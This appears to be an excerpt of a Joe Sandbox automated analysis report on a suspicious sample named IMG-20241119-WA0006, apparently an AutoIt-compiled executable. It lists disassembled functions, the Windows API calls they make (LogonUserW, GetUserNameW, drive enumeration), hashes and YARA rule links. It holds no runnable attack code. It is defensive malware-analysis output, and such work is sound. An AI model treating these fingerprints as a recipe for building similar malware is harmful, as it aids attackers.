Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: c29b1b504d9cdef1925e56d627de238840e2a7fc1e97e0a57836a8b986ab7d62
Instruction ID: 29a6a2673a8f6f82a0784ea2940939863bafc53d87ccc9e729711f0a0b06265c
Opcode Fuzzy Hash: c29b1b504d9cdef1925e56d627de238840e2a7fc1e97e0a57836a8b986ab7d62
Instruction Fuzzy Hash: 53D05EA012C30538EC7D0724DC0FF7E0948F3107C1F80818DB58AC94C2BAC058459832

Function 000BB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,000BAD3E), ref: 000BB124

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: dddc190dfe4a462f4ca8bfda546a83c57846a357bbb43cd4dc45d131938bce25
Instruction ID: 055750e413a0190fc865d7da9952dc2ae4d1c9eb7b6527b81cdc3031b4c013ed
Opcode Fuzzy Hash: dddc190dfe4a462f4ca8bfda546a83c57846a357bbb43cd4dc45d131938bce25
Instruction Fuzzy Hash: D4D05E320A460EAEDF024FA4EC02EAE3F6AEB04700F408110FA15C50A0C671D531AB50

Function 000FB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 000FB352

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: e5aae40edefac2e8760749040548dae0d4caad2dca0938f35fd172ce32bcf8c5
Instruction ID: 06a5d1bf6837af72efb08a4ea3747493b91d2aa362dab6acd977e48712cff75c
Opcode Fuzzy Hash: e5aae40edefac2e8760749040548dae0d4caad2dca0938f35fd172ce32bcf8c5
Instruction Fuzzy Hash: 65C04CF140014DDFD751CBD0D9449EEB7BCAB04301F104091A249F1510D7709B859B72

Function 000A8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 000A818F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: dc3c928c2a1e3f3f48f4f892eba502c4b66c2307bdf0463f6c6aae320715f461
Instruction ID: 0b74dae6d05fc59afbec53bb508ddd155c62ea851152eacc41895cb42d876645
Opcode Fuzzy Hash: dc3c928c2a1e3f3f48f4f892eba502c4b66c2307bdf0463f6c6aae320715f461
Instruction Fuzzy Hash: 94A0223000030CFBCF002FC2FC0A8883F2CFB002A0B000020F80C08830CBB3A8A08AC2

Function 0008E3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 524a016199f55cb242e8c3d700c60009cde51844663f37268b87a4dc79af5d6c
Instruction ID: 458dc1d410e6887e5ab0bab12c2a26e39f727a74f4cb4f4b733bda3d265cacd8
Opcode Fuzzy Hash: 524a016199f55cb242e8c3d700c60009cde51844663f37268b87a4dc79af5d6c
Instruction Fuzzy Hash: 6B22C070A0424ACFDB64EF58C480ABEB7F0FF14314F148069E99A9B352E735AD81DB91

Function 000893F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa603a83d060fdecb784d0b576a064af36cc7ad5631ca1e30237b4c40d66e682
Instruction ID: 0b0614ca7e2ad32f2b261e9057020a5611a2f3aa5267a81f883bbc4b3892ea77
Opcode Fuzzy Hash: aa603a83d060fdecb784d0b576a064af36cc7ad5631ca1e30237b4c40d66e682
Instruction Fuzzy Hash: 84127970A00609ABDF14EFA4D985AFEB7F5FF48300F148529E846E7651EB36AD20DB50

Function 0008AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 98b2460be2bc42d7d565a9673b54a4c9e934292646975abc668bd031cf39a833
Instruction ID: 1e85824fb2ad3c8c11b73b414cb2e5a40c1ba5ab19256afa9a5cef8325f9973d
Opcode Fuzzy Hash: 98b2460be2bc42d7d565a9673b54a4c9e934292646975abc668bd031cf39a833
Instruction Fuzzy Hash: 6802C070A00209DBCF14EF68D981ABEBBF5FF44300F108069E946DB296EB35DA11DB91

Function 000A02A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: ebf3ee9f3efa05828d28598af8b52ebc6441acfa97a721e45383a00846bec41e
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 5BC1B2322051A70ADFAD467AC47453EFAE15BA3BB531A076DD8B3CB4D5EF20C524E620

Function 000A06D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 6c6e10a3284589984336f536da49f9101625a1850fe55b6015156a9dc336fa96
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: DDC1A0322091970AEFAD467AC43453EBAE15BA3BB131A076DD4B3CB4D5EF20D524E620

Function 0009FE6F Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 210e185b9782a8ac592dfa8e839a071ec9e0034c88333d32d32b1eec66618c09
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 66C191322051970ADFAD863AC43453EBAE15FA2BB171A077DD4B3CB5E5EF20C564E620

Function 0009FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: ec6d63e2590df344e8ddf0b236a938d19c5e639f97e8e5d3ebab60ae1a970a7b
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: E5C1903220909309DFAD463AC47443EBBE15BA2BB531A077DD8B3CB5E5EF20D564E620

Function 00F5CA68 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 52e8f2539cbd359d03fd77a7c5716049a4a99540f9a8e11f71fd330b2fc6079c
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 4F41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80

Function 00F5C8F8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: d57059ed205a6f87ed114c54a8d6cca3e887c00a38e1666e4ef2ea683232c658
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 51018079A00209EFCB44DF98C5909AEFBB5FB48310F208599ED19A7701D730AE41EB80

Function 00F5C958 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 028fa6b0a519a885c7d4d976200874a5222dd0322ad1011913f901556044df96
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 9C018079A00209EFCB44DF98C5909AEFBB5FB48310F208599ED09A7701D730AE41EB80

Function 00F5B2D8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 000DA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 000DA2FE
DeleteObject.GDI32(00000000), ref: 000DA310
DestroyWindow.USER32 ref: 000DA31E
GetDesktopWindow.USER32 ref: 000DA338
GetWindowRect.USER32(00000000), ref: 000DA33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 000DA480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 000DA490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA4D8
GetClientRect.USER32(00000000,?), ref: 000DA4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000DA51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA55E
GlobalLock.KERNEL32(00000000), ref: 000DA567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA576
GlobalUnlock.KERNEL32(00000000), ref: 000DA57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA586
GlobalFree.KERNEL32(00000000), ref: 000DA591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0010D9BC,00000000), ref: 000DA5B9
GlobalFree.KERNEL32(00000000), ref: 000DA5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 000DA5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 000DA60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA81D

Strings

DISPLAY, xrefs: 000DA680
, xrefs: 000DA7A3
static, xrefs: 000DA518, 000DA66F
AutoIt v3, xrefs: 000DA4D0

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: dd5a26546ed588d03dbe9e92e1fb0941cebe9c71b7e2b9685c592fbd03ecd6f4
Instruction ID: 102cedf6d2e41484313e8c80d2d021a9f38a948617e3d0f0bdbc13a04c16971a
Opcode Fuzzy Hash: dd5a26546ed588d03dbe9e92e1fb0941cebe9c71b7e2b9685c592fbd03ecd6f4
Instruction Fuzzy Hash: 9A027C75A00204EFDB14DFA4DD89EAE7BB9FB49310F048159F955AB2A1CB70ED81CB60

Function 000ED285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 000ED2DB
GetSysColorBrush.USER32(0000000F), ref: 000ED30C
GetSysColor.USER32(0000000F), ref: 000ED318
SetBkColor.GDI32(?,000000FF), ref: 000ED332
SelectObject.GDI32(?,00000000), ref: 000ED341
InflateRect.USER32(?,000000FF,000000FF), ref: 000ED36C
GetSysColor.USER32(00000010), ref: 000ED374
CreateSolidBrush.GDI32(00000000), ref: 000ED37B
FrameRect.USER32(?,?,00000000), ref: 000ED38A
DeleteObject.GDI32(00000000), ref: 000ED391
InflateRect.USER32(?,000000FE,000000FE), ref: 000ED3DC
FillRect.USER32(?,?,00000000), ref: 000ED40E
GetWindowLongW.USER32(?,000000F0), ref: 000ED439

Part of subcall function 000ED575: GetSysColor.USER32(00000012), ref: 000ED5AE
Part of subcall function 000ED575: SetTextColor.GDI32(?,?), ref: 000ED5B2
Part of subcall function 000ED575: GetSysColorBrush.USER32(0000000F), ref: 000ED5C8
Part of subcall function 000ED575: GetSysColor.USER32(0000000F), ref: 000ED5D3
Part of subcall function 000ED575: GetSysColor.USER32(00000011), ref: 000ED5F0
Part of subcall function 000ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000ED5FE
Part of subcall function 000ED575: SelectObject.GDI32(?,00000000), ref: 000ED60F
Part of subcall function 000ED575: SetBkColor.GDI32(?,00000000), ref: 000ED618
Part of subcall function 000ED575: SelectObject.GDI32(?,?), ref: 000ED625
Part of subcall function 000ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 000ED644
Part of subcall function 000ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000ED65B
Part of subcall function 000ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 000ED670
Part of subcall function 000ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000ED698

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: f55e3284c78c78b380c43d4cb21f742dbe7ff3fe670e0c95b6fee76b8c3c702e
Instruction ID: d2c618cdeb479e62c41f2a24dce3aec7cd6917e71694e203ff9ec1e6a3808115
Opcode Fuzzy Hash: f55e3284c78c78b380c43d4cb21f742dbe7ff3fe670e0c95b6fee76b8c3c702e
Instruction Fuzzy Hash: 39917271408301BFC7109FA4EC08A6B7BF9FF85325F104A19F9A2A61E0DBB1D984CB52

Function 0009B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0009B98B
DeleteObject.GDI32(00000000), ref: 0009B9CD
DeleteObject.GDI32(00000000), ref: 0009B9D8
DestroyIcon.USER32(00000000), ref: 0009B9E3
DestroyWindow.USER32(00000000), ref: 0009B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 000FD2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000FD2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 000FD711

Part of subcall function 0009B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0009B759,?,00000000,?,?,?,?,0009B72B,00000000,?), ref: 0009BA58

SendMessageW.USER32 ref: 000FD758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000FD76F
ImageList_Destroy.COMCTL32(00000000), ref: 000FD785
ImageList_Destroy.COMCTL32(00000000), ref: 000FD790

Strings

0, xrefs: 000FD5A5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: b7d1f9e2f3229cf0e1272a0e91db09e8a4685d07c3341e162c575be5132496b7
Instruction ID: 831104680da42e1f52e8af9b46d71c1cec49aee4712c43d62f431a76ad595b5e
Opcode Fuzzy Hash: b7d1f9e2f3229cf0e1272a0e91db09e8a4685d07c3341e162c575be5132496b7
Instruction Fuzzy Hash: 21129E30104205DFDB61DF28D988BB9B7E6FF45314F14456AEA89CBA62C731EC81EB91

Function 000CDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000CDBD6
GetDriveTypeW.KERNEL32(?,0011DC54,?,\\.\,0011DC00), ref: 000CDCC3
SetErrorMode.KERNEL32(00000000,0011DC54,?,\\.\,0011DC00), ref: 000CDE29

Strings

Network, xrefs: 000CDD01
ATA, xrefs: 000CDDA1
Unknown, xrefs: 000CDCE3, 000CDD8C
iSCSI, xrefs: 000CDDCB
MMC, xrefs: 000CDDE7
\\.\, xrefs: 000CDC2B
FileBackedVirtual, xrefs: 000CDDF5
PhysicalDrive, xrefs: 000CDC67
CDROM, xrefs: 000CDCF7
Virtual, xrefs: 000CDDEE
Fibre, xrefs: 000CDDB6
ATAPI, xrefs: 000CDD9A
Removable, xrefs: 000CDD15
SSD, xrefs: 000CDD50
Fixed, xrefs: 000CDD0B
RAID, xrefs: 000CDDC4
SCSI, xrefs: 000CDD93
SAS, xrefs: 000CDDD2
SATA, xrefs: 000CDDD9
RAMDisk, xrefs: 000CDCED
SSA, xrefs: 000CDDAF
USB, xrefs: 000CDDBD
1394, xrefs: 000CDDA8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 4adf32598cf13d96bebc2418b81f1fdfaf22399d51f39179f462980c7a413522
